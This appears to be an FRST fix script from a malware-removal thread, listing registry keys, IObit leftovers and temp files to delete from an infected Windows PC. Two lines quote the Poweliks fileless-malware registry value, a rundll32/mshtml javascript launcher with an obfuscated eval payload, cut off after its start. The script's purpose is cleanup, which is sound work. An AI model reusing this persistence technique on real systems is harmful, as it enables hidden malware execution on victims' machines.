CloseProcesses:
HKU\S-1-5-21-1466444306-1903263773-3823580658-1001\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
BHO: ExplorerWnd Helper -> {10921475-03CE-4E04-90CE-E2E7EF20C814} -> C:\Program Files (x86)\IObit\IObit Uninstaller\UninstallExplorer64.dll No File
BHO-x32: Ads Removal -> {9D974C8C-6D92-44FB-BEAF-B45A1C0CF17F} -> C:\Program Files (x86)\IObit\IObit Malware Fighter\adsremoval\IE\Adblock.dll No File
R4 RegFilter; \??\C:\Program Files (x86)\IObit\IObit Malware Fighter\drivers\win7_amd64\regfilter.sys [X]
2014-11-08 14:00 - 2014-11-08 14:00 - 00000000 ____D () C:\Users\Owner\AppData\Roaming\ProductData
2014-11-08 13:59 - 2014-11-08 13:59 - 00000000 ____D () C:\ProgramData\ProductData
2014-11-08 13:59 - 2014-11-08 13:59 - 00000000 ____D () C:\ProgramData\{E1ED556E-3EA0-4F44-8BE7-CC5FB0F4B424}
2014-11-08 13:59 - 2014-11-08 13:59 - 00000000 ____D () C:\ProgramData\{D76294E6-03B8-4971-AF2E-3F846161A690}
2014-11-08 13:57 - 2014-11-08 13:59 - 00000000 ____D () C:\Users\Owner\AppData\Roaming\IObit
2014-11-08 13:57 - 2014-11-08 13:59 - 00000000 ____D () C:\Program Files (x86)\IObit
2014-11-08 13:56 - 2014-11-08 13:57 - 00000000 ____D () C:\ProgramData\IObit
2014-11-15 14:05 - 2014-10-15 20:55 - 00000000 ___HD () C:\ProgramData\{9A88E103-A20A-4EA5-8636-C73B709A5BF8}
CustomCLSID: HKU\S-1-5-21-1466444306-1903263773-3823580658-1001_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
CustomCLSID: HKU\S-1-5-21-1466444306-1903263773-3823580658-1001_Classes\CLSID\{F6BF8414-962C-40FE-90F1-B80A7E72DB9A}\InprocServer32 -> C:\ProgramData\{9A88E103-A20A-4EA5-8636-C73B709A5BF8}\ifsdrives.dll (Microsoft Corporation)
S2 LiveUpdateSvc; C:\Program Files (x86)\IObit\LiveUpdate\LiveUpdate.exe [2151744 2014-01-06] (IObit)
2014-11-14 21:45 - 2014-11-14 21:45 - 06000640 _____ () C:\Program Files (x86)\GUTACDA.tmp
2014-11-14 21:45 - 2014-11-14 21:45 - 00000000 ____D () C:\Program Files (x86)\GUM874F.tmp
2014-11-13 20:41 - 2014-11-13 20:42 - 00000000 ____D () C:\Program Files (x86)\GUMC4F.tmp
2014-11-13 20:41 - 2014-11-13 20:41 - 06000640 _____ () C:\Program Files (x86)\GUT13A0.tmp
EmptyTemp: